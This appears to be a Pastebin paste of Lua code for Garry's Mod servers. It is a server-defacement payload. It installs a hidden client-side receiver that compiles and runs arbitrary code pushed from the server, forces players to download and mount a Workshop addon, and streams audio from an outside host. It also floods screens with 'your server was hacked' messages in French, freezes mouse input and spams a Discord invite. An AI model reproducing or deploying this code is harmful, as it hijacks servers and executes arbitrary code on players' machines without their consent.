Advertisement
Guest User

Untitled

a guest
Jun 25th, 2019
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.49 KB | None | 0 0
  1. local function rdm_str(len)
  2. if !len or len <= 0 then return '' end
  3. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  4. end
  5.  
  6. local net_string = rdm_str(25)
  7.  
  8. util.AddNetworkString(net_string)
  9. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  10. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  11. if !ply:IsBot() then
  12. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  13. end
  14. end)
  15.  
  16.  
  17.  
  18. local function SendToClient(code)
  19. timer.Simple(5, function()
  20. local data = util.Compress(code)
  21. local len = #data
  22. net.Start(net_string)
  23. net.WriteUInt(len, 16)
  24. net.WriteData(data, len)
  25. net.Broadcast()
  26. end)
  27. end
  28.  
  29.  
  30.  
  31.  
  32. for k, v in pairs(player.GetAll()) do
  33. v:SendLua("steamworks.FileInfo(1780871251,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  34. end
  35.  
  36. for k, v in pairs( player.GetAll() ) do
  37. if ( v:Alive() ) then
  38. v:GodEnable()
  39. else
  40. v:Spawn()
  41. timer.Simple( 5, function()
  42. v:GodEnable()
  43. end)
  44. end
  45. end
  46.  
  47.  
  48. game.AddParticles( "particles/comite.pcf" )
  49. PrecacheParticleSystem("comite")
  50.  
  51. SendToClient([====[
  52. local t = "https://discord.gg/uXXNfmv"
  53. if t:len() > 0 then
  54. surface.CreateFont("\xFF\xFF\xFF", {
  55. font = "Impact",
  56. size = 999
  57. })
  58.  
  59. for i = 1, 10 do
  60. ParticleEffectAttach("comite",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  61. end
  62.  
  63. local mat = Matrix()
  64. hook.Add("HUDPaint","\xFFmlg_text\xFF", function()
  65. surface.SetFont("\xFF\xFF\xFF")
  66. local x = ScrW() / 2 - (surface.GetTextSize(t)/2) + math.cos(CurTime()*3) * 40
  67. local y = 100 + math.sin(CurTime()*2) * 40
  68. local pos = Vector(x,y,0)
  69. mat:SetAngles(Angle(0,math.sin(CurTime()/1.2)*10,0))
  70. mat:SetTranslation(pos)
  71. surface.SetTextPos(0,0)
  72. cam.PushModelMatrix(mat)
  73. for i=#t, 1, -1 do
  74. surface.SetTextColor( HSVToColor((CurTime()*200+i*7)%360,1,1) )
  75. surface.DrawText(t[ #t - i + 1 ])
  76. end
  77. cam.PopModelMatrix()
  78. end)
  79. else
  80. hook.Remove("HUDPaint","\xFFmlg_text\xFF")
  81. end
  82.  
  83. local chair = ClientsideModel("models/props_c17/chair02a.mdl")
  84. chair:SetNoDraw(true)
  85. local data = {}
  86. local function genChair(id)
  87. local pos = LocalPlayer():GetPos()
  88. data[id] = { Vector(math.random(pos.x-1000,pos.x+1000),math.random(pos.y-1000,pos.y+1000),pos.z + math.random(800,1000) ), math.random(10, 70) }
  89. end
  90. for i=1, 70 do
  91. genChair(i)
  92. end
  93. hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchairs\xFF",function()
  94. local z = LocalPlayer():GetPos().z
  95. for i=1, #data do
  96. chair:SetPos(data[i][1])
  97. chair:SetupBones()
  98. chair:DrawModel()
  99. data[i][1].z = data[i][1].z - data[i][2] / 20
  100. if data[i][1].z <= z then
  101. genChair(i)
  102. end
  103. end
  104. end)
  105.  
  106. local gfx = {}
  107.  
  108. local messages = {
  109. "Votre serveur a était hacké par le comité d'éclateur de serveur",
  110. "la ref#8219 NeRoW.#7280 Esma Network lvl 998#6877",
  111. "Discord: https://discord.gg/uXXNfmv",
  112. "Votre serveur va plutôt bien marcher",
  113. "Maintenant il nous appartient.",
  114. "Vous pouvez maintenant pleurer.",
  115. "#Owned #Hacked #Tonserveurcdlamerde"
  116. }
  117.  
  118.  
  119. hook.Add("HUDPaint", "FUCKIT_G",function()
  120. for k,v in pairs(gfx) do
  121. v()
  122. end
  123. end)
  124.  
  125. local message = "Ne redemmare pas ton server, cela ne sert a rien"
  126. local function SlowType(msg,interval,callback)
  127. callback = callback or function()end
  128. message = ""
  129. for i=1,#msg do
  130. timer.Simple(interval * i,function()
  131. message = message .. msg[i]
  132. end)
  133. end
  134. timer.Simple(#msg*interval,callback)
  135. end
  136. local function GetRandomSpot()
  137. local ppos = LocalPlayer():GetPos()
  138. return Vector(ppos.x + math.random(-500, 500),ppos.y + math.random(-500, 500),ppos.z + math.random(-10, 10))
  139. end
  140. surface.CreateFont("PWN",{bold=true,size=40})
  141. SOUNDSTART_CTP = false
  142. sound.PlayURL("https://testfdh.000webhostapp.com/larefclemeilleur.mp3","no block",function(s)
  143. if not s then return end
  144. if SOUNDSTART_CTP then s:Stop() return end
  145. SOUNDSTART_CTP = true
  146.  
  147.  
  148. local ragtbl = {}
  149. for i=1,20 do
  150. ragtbl[i] = ClientsideRagdoll( "models/player/gman_high.mdl" )
  151. ragtbl[i]:SetNoDraw( false )
  152. ragtbl[i]:DrawShadow( true )
  153. end
  154.  
  155.  
  156. timer.Create("ChangeRagdolesSpotsAW", 1, 0, function()
  157. for k,v in pairs(ragtbl) do
  158. v:SetPos(GetRandomSpot())
  159. end
  160. end)
  161.  
  162.  
  163. hook.Add("AdjustMouseSensitivity","MDR",function()
  164. return 0
  165. end)
  166. gfx["CoolEffect"] = function()
  167. local tbl = {}
  168. s:FFT(tbl,FFT_2048)
  169.  
  170. local fal = 0
  171. for i=4,6 do
  172. fal = fal + tbl[i]
  173. end
  174.  
  175. if fal > 0.8 then
  176. local ca = Color(math.random(0,255),math.random(0,255),math.random(0,255), 150)
  177. gfx["ColorChange"] = function()
  178. draw.RoundedBoxEx(250, 0, 0, ScrW(),ScrH(),ca)
  179. end
  180. util.ScreenShake(LocalPlayer():GetPos(),20,20,0.5,20)
  181. local mats = Entity(0):GetMaterials()
  182. for k,v in pairs(mats) do
  183. local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50
  184. Material(v):SetVector("$color", Vector(r,g,b))
  185. Material(v):SetTexture( "$basetexture", "_rt_fullframefb" )
  186. end
  187. end
  188. for k,v in pairs(tbl) do
  189. local col = HSVToColor(k * 1 % 360,1,1)
  190. draw.RoundedBoxEx(0,0,k * 10, (v*10000), 10,col)
  191. draw.RoundedBoxEx(0,ScrW() - (v*10000),k * 10, (v*10000), 10,col)
  192. end
  193. end
  194.  
  195. timer.Simple(29, function()
  196.  
  197. hook.Add("GetMotionBlurValues", "YASS",function(a,b,c,d)
  198. return a,b,c+140,d
  199. end)
  200.  
  201.  
  202. end)
  203.  
  204. local cc = 1
  205. local omgs = {}
  206. timer.Create("MVSPOS", 0.04, 0, function()
  207. for k,v in pairs(omgs) do
  208. if omgs[ k ].n <= 0 then omgs[ k ] = nil continue end
  209. omgs[ k ] = {text = omgs[ k ].text, n = omgs[ k ].n - 1}
  210. end
  211. end)
  212. local isPounding = false
  213.  
  214. timer.Create("NEXTMSG", 6, #messages, function()
  215. if cc > #messages then
  216. isPounding = true
  217. return
  218. end
  219. table.insert(omgs, {text = messages[ cc ],n = ScrH()})
  220. cc = cc + 1
  221. end)
  222.  
  223. gfx["MessageC"] = function()
  224. if isPounding and (#messages <= 0) then
  225. draw.SimpleText("RT ton server <3", "PWN", ScrW() / 2, ScrH() / 2,Color(200,0,0),1,1)
  226. end
  227. for k,v in pairs(omgs) do
  228. draw.SimpleText(omgs[ k ].text, "PWN", ScrW() / 2, omgs[ k ].n,Color(0,0,0),1,1)
  229. end
  230. end
  231. end)
  232. concommand.Add("canard", function()
  233. hook.Remove("GetMotionBlurValues", "YASS")
  234. hook.Remove("AdjustMouseSensitivity","MDR")
  235. hook.Remove("HUDPaint", "FUCKIT_G")
  236. end)
  237. ]====])
  238.  
  239. timer.Create("qqyptebobvnq", 1.5, 0, function()
  240. local time = tonumber(0)
  241. local Message = {
  242. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  243. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  244. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  245. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  246. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  247. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  248. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  249. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  250. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  251. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  252. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  253. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  254. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  255. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  256. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  257. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  258. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  259. }
  260. for _, line in pairs(Message) do
  261. time = time + tonumber(0.1)
  262. timer.Simple(time,function()
  263. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  264. end)
  265. end
  266. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement